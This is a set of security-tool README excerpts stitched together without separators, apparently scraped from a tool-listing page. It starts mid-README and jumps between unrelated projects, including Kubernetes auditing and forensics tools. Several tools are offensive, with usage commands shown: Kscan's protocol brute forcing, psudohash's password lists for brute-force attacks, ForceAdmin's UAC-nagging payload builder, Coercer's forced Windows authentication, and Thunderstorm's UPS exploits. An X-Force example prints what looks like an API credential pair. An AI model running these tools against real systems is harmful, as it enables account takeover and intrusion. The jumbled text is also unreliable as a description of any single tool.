--max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)
NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse
Examples
Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:
Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50
Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt
Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.
Legal Disclaimer:
You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.
Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation.
Active deception can live migrate the attacker to the honeypot without awareness. We can achieve a higher security level at a lower cost with Active deception.
English | δΈζζζ‘£
docker info
docker-compose version
docker-compose build
docker-compose up -d
update config.yaml,replace ${honeypot_public_ip} to the public IP of honeypot service
./mimicry-tools webshell -c config.yaml -t php -p webshell_path
Tool | Description |
---|---|
Web-Deception | Fake vulnerabilities in web applications |
Webshell-Deception | live migrate webshell to the honeypot |
Shell-Deception | live migrate ReverseShell/BindShell to the honeypot |
Thunderstorm is a modular framework to exploit UPS devices.
For now, only the CS-141 and NetMan 204 exploits will be available. The beta version of the framework will be released on the future.
Thunderstorm is currently capable of exploiting the following CVE:
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/Thunderstorm
Also, you probably need to download the original and the custom firmware. You can download all requirements from here: https://darkbyte.net/links/thunderstorm.php
- To be disclosed
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
IBM Security X-FORCE ExchangeΒ libraryΒ in Python 3. Search: threat_activities, threat_groups, malware_analysis, collector and industries.
pip3 install XForce
Using you API_KEY make a basic authentication. After make a base64 code β Key + : + Password:
printf "d2f5f0f9-2995-42c6-b1dd-4c92252da129:06c41d5e-0604-4c7c-a599-300c367d2090" | base64
# ZDJmNWYwZjktMjk5NS00MmM2LWIxZGQtNGM5MjI1MmRhMTI5OjA2YzQxZDVlLTA2MDQtNGM3Yy1hNTk5LTMwMGMzNjdkMjA5MAo=
Using API_KEY, call functions.
import XForce
# Args: 1 - Term of search, 2 - API KEY
# Threat activity search return in string
XForce.threat_activities(Term, API_KEY)
# Malware analysis search return in string
XForce.malware_analysis(Term, API_KEY)
# Threat groups search return in string
XForce.threat_groups(Term, API_KEY)
# Industries search return in string
XForce.industries(Term, API_KEY)
# All categories search return in list with dict
XForce.industries(Term, API_KEY)
For see more details of consult, run:
from XForce import details
# Args: 1 - GUID, 2 - API KEY
# IMPORTANT: all GUID are correspondent to category
# All function of details have:
# url Γ’β β with x-force exchange panel
details.activity(Id, API_KEY)
details.group(Id, API_KEY)
details.malware(Id, API_KEY)
details.industry(Id, API_KEY)
Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!
Popeye is available on Linux, OSX and Windows platforms.
Binaries for Linux, Windows and Mac are available as tarballs in the release page.
For OSX/Unit using Homebrew/LinuxBrew
brew install derailed/popeye/popeye
Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:
Clone the repo
Add the following command in your go.mod file
replace (
github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
)
Build and run the executable
go run main.go
Quick recipe for the impatient:
# Clone outside of GOPATH
git clone https://github.com/derailed/popeye
cd popeye
# Build and install
go install
# Run
popeye
Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.
export TERM=xterm-256color
Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.
The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...
Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!
Here is a list of some of the available sanitizers:
Resource | Sanitizers | Aliases | |
---|---|---|---|
ο | Node | no | |
Conditions ie not ready, out of mem/disk, network, pids, etc | |||
Pod tolerations referencing node taints | |||
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM) | |||
ο | Namespace | ns | |
Inactive | |||
Dead namespaces | |||
ο | Pod | po | |
Pod status | |||
Containers statuses | |||
ServiceAccount presence | |||
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM) | |||
Container image with no tags | |||
Container image using latest tag | |||
Resources request/limits presence | |||
Probes liveness/readiness presence | |||
Named ports and their references | |||
ο | Service | svc | |
Endpoints presence | |||
Matching pods labels | |||
Named ports and their references | |||
ο | ServiceAccount | sa | |
Unused, detects potentially unused SAs | |||
ο | Secrets | sec | |
Unused, detects potentially unused secrets or associated keys | |||
ο | ConfigMap | cm | |
Unused, detects potentially unused cm or associated keys | |||
ο | Deployment | dp, deploy | |
Unused, pod template validation, resource utilization | |||
ο | StatefulSet | sts | |
Unsed, pod template validation, resource utilization | |||
ο | DaemonSet | ds | |
Unsed, pod template validation, resource utilization | |||
ο | PersistentVolume | pv | |
Unused, check volume bound or volume error | |||
ο | PersistentVolumeClaim | pvc | |
Unused, check bounded or volume mount error | |||
ο | HorizontalPodAutoscaler | hpa | |
Unused, Utilization, Max burst checks | |||
ο | PodDisruptionBudget | ||
Unused, Check minAvailable configuration | pdb | ||
ο | ClusterRole | ||
Unused | cr | ||
ο | ClusterRoleBinding | ||
Unused | crb | ||
ο | Role | ||
Unused | ro | ||
ο | RoleBinding | ||
Unused | rb | ||
ο | Ingress | ||
Valid | ing | ||
ο | NetworkPolicy | ||
Valid | np | ||
ο | PodSecurityPolicy | ||
Valid | psp |
You can also see the full list of codes
To save the Popeye report to a file pass the --save
flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR
. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension>
(e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file
flag with the filename you want as parameter.
Example to save report in working directory:
$ POPEYE_REPORT_DIR=$(pwd) popeye --save
Example to save report in working directory in HTML format under the name "report.html" :
$ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html
You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket
. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report
.
Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.
Example to save report to S3:
popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json
If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:
popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT
You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye
, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v
:
docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar
Running the above docker command with --rm
means that the container gets deleted when popeye exits. When you use --save
, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR
env variable.
docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt
# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>
You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.
# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help
Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.
Format | Description | Default | Credits |
---|---|---|---|
standard | The full monty output iconized and colorized | yes | |
jurassic | No icons or color like it's 1979 | ||
yaml | As YAML | ||
html | As HTML | ||
json | As JSON | ||
junit | For the Java melancholic | ||
prometheus | Dumps report a prometheus scrappable metrics | dardanel | |
score | Returns a single cluster sanitizer score value (0-100) | kabute |
A spinach.yml configuration file can be specified via the -f
option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.
NOTE: This file will change as Popeye matures!
Under the excludes
key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets
. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods
, v1/services
, v1/configmaps
).
A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name
.
For example, the FQN of a pod named fred-1234
in the namespace blee
will be blee/fred-1234
. This provides for differentiating fred/p1
and blee/p1
. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx:
prefix.
NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye βconfiglessβ to make sure you will recognize any new issues that may have arisen in your clustersβ¦
Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach
. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)
# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.
# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
code s:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*
# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80
# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if about these threshold.
limits:
cpu: 80
memory: 75
# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io
Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.
Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.
kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi
The --force-exit-zero
should be set to true
. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.
In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.
Sample Popeye RBAC Rules (please note that those are subject to change.)
---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye
---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources :
- pods
- nodes
verbs: ["get", "list"]
---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io
The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:
Level | Icon | Jurassic | Color | Description |
---|---|---|---|---|
Ok | β
| OK | Green | Happy! |
Info | ο | I | BlueGreen | FYI |
Warn | ο± | W | Yellow | Potential Issue |
Error | ο₯ | E | Red | Action required |
The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.
The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.
This initial drop is brittle. Popeye will most likely blow up whenβ¦
This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!
Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!
This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.
When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.
We reserve the right to pursue your legal responsibility if the above prohibited behavior is found.
If you have any illegal behavior in the process of using this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint responsibility.
Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.
Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this Agreement in any other express or implied manner shall be deemed that you have read and agreed to be bound by this Agreement.
_ __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|
Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, and obtain as much port information as possible without sending more packets. It can perform automatic brute force cracking on scan results, and is the first open source RDP brute force cracking tool on the go platform.
At present, there are actually many tools for asset scanning, fingerprint identification, and vulnerability detection, and there are many great tools, but Kscan actually has many different ideas.
Kscan hopes to accept a variety of input formats, and there is no need to classify the scanned objects before use, such as IP, or URL address, etc. This is undoubtedly an unnecessary workload for users, and all entries can be normal Input and identification. If it is a URL address, the path will be reserved for detection. If it is only IP:PORT, the port will be prioritized for protocol identification. Currently Kscan supports three input methods (-t,--target|-f,--fofa|--spy).
Kscan does not seek efficiency by comparing port numbers with common protocols to confirm port protocols, nor does it only detect WEB assets. In this regard, Kscan pays more attention to accuracy and comprehensiveness, and only high-accuracy protocol identification , in order to provide good detection conditions for subsequent application layer identification.
Kscan does not use a modular approach to do pure function stacking, such as a module obtains the title separately, a module obtains SMB information separately, etc., runs independently, and outputs independently, but outputs asset information in units of ports, such as ports If the protocol is HTTP, subsequent fingerprinting and title acquisition will be performed automatically. If the port protocol is RPC, it will try to obtain the host name, etc.
Kscan currently has 3 ways to input targets
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
[Empty]: will detect the IP address of the local machine and detect the B segment where the local IP is located
[all]: All private network addresses (192.168/172.32/10, etc.) will be probed
IP address: will detect the B segment where the specified IP address is located
fofa search keywords: will directly return fofa search results
usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]
optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check Fingerprinting the target address, only port detection will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified portsοΌsupportοΌ80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
-Cn With this parameter, the console output will not be colored.
-sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
--hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
hydra options:
--hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
--hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
--hydra-update Customize the user name and password mode. If this parameter is carried, it is a new mode, and the user name and password will be added to the default dictionary. Otherwise the default dictionary will be replaced.
--hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter
The function is not complicated, the others are explored by themselves
During the forensic analysis of a Windows machine, you may find the name of a deleted prefetch file. While its content may not be recoverable, the filename itself is often enough to find the full path of the executable for which the prefetch file was created.
The following fields must be provided:
Executable name
Including the extension. It will be embedded in the prefetch filename, unless this happens.
Prefetch hash
8 hexadecimal digits at the end of the prefetch filename, right before the .pf
extension.
Hash function
Bodyfile
Mount point
There are 3 known prefetch hash functions:
SCCA XP
Used in Windows XP
SCCA Vista
Used in Windows Vista and Windows 10
SCCA 2008
Used in Windows 7, Windows 8 and Windows 8.1
A bodyfile of the volume the executable was executed from.
The bodyfile format is not very restrictive, so there are a lot of variations of it - some of which are not supported. Body files created with fls
and MFTECmd
should work fine.
The mount point of the bodyfile, as underlined below:
0|C:/Users/Peter/Desktop ($FILE_NAME)|62694-48-2|d/d-wx-wx-wx|...
The provided bodyfile is used to get the path of every folder on the volume. The tool appends the provided executable name to each of those paths to create a list of possible full paths for the executable. Each possible full path is then hashed using the provided hash function. If there's a possible full path for which the result matches the provided hash, that path is outputted.
The following cases are not supported:
svchost.exe
and mmc.exe
/prefetch:#
flagIf the executable name is longer than 29 characters (including the extension), it will be truncated in the prefetch filename. For example, executing this file:
This is a very long file nameSo this part will be truncated.exe
From the C:\Temp
directory on a Windows 10 machine, will result in the creation of this prefetch file:
THIS IS A VERY LONG FILE NAME-D0B882CC.pf
In this case, the executable name cannot be derived from the prefetch filename, so you will not be able to provide it to the tool.
psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.
System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:
The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):
transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]
When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?
No special requirements. Just clone the repo and make the script executable:
git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py
./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]
The help dialog [ -h, --help ] includes usage details and examples.
--years
and --append-numbering
with a --numbering-limit
β₯ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.
ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.
For building on your own, the following NuGet packages are needed
Fody
: "Extensible tool for weaving .net assemblies."Costura.Fody
"Fody add-in for embedding references as resources."Microsoft.AspNet.WebApi.Client
"This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."You can download the latest tarball by clicking here or latest zipball by clicking here.
Download the project:
$ git clone https://github.com/catzsec/ForceAdmin.git
Enter the project folder
$ cd ForceAdmin
Run ForceAdmin:
$ dotnet run
Compile ForceAdmin:
$ dotnet publish -r win-x64 -c Release -o ./publish/
Any questions, errors or solutions, create an Issue in the Issues tab.
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
--analyze
, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.--targets-file
--webdav-host
and --webdav-port
$ ./Coercer.py -h
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]
Automatic windows authentication coercer over various RPC calls.
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.
In attack mode (without --analyze
option) you get the following output:
After all the RPC calls, you get plenty of authentications in Responder:
Pull requests are welcome. Feel free to open an issue if you want to add other features.
ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).
I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of Cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is however, simple to use, decently flexible, and in practice only marginally slower than other "tried-and-true" tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.
This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:
ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.
The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.
Please Enumerate Responsibly!
ZenBuster is licensed under the GNU GPLv3 License, see here for more information.
Yin-Yang ASCII art in the banners were created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, when specified with: 'zg'.
Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:
git clone https://github.com/0xTas/zenbuster.git
Next, cd zenbuster
.
ZenBuster relies on 3 external libraries to function, and it is recommended to install these with:
pip install -r requirements.txt
The modules that will be installed and their purposes are as follows:
These dependencies may be installed manually, with pip
using requirements.txt, or via interaction with the script upon first run.
Once dependencies have been installed, you can run the program in the following ways:
./zenbuster.py [options]
or python3 zenbuster.py [options]
python zenbuster.py [options]
Short Flag | Long Flag | Purpose |
---|---|---|
-h | --help | Displays the help screen and exits |
-d | --dirs | Enables Directory Enumeration Mode |
-s | -ssl | Forces usage of HTTPS in requests |
-v | --verbose | Prints verbose info to terminal/log |
-q | --quiet | Minimal terminal output until final results |
-nc | --no-color | Disables colored terminal output |
-nl | --no-lolcat | Disables lolcat-printed banner (Linux only) |
-u <hostname> | --host | Host to target for the scan |
-w <wordlist> | --wordlist | Path to wordlist/dictionary file |
-x <exts> | --ext | Comma-separated list of file extensions (Dirs only) |
-p <port#> | --port | Custom port option for nonstandard webservers |
-o [filename] | --out-file | Log results to a file (accepts custom name/path) |
./zenbuster.py -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v
python3 zenbuster.py -w ../subdomains.txt --host target.thm --ssl -O myResults.log
zenbuster -w subdomains.txt -u target.thm --quiet
(With .bashrc alias)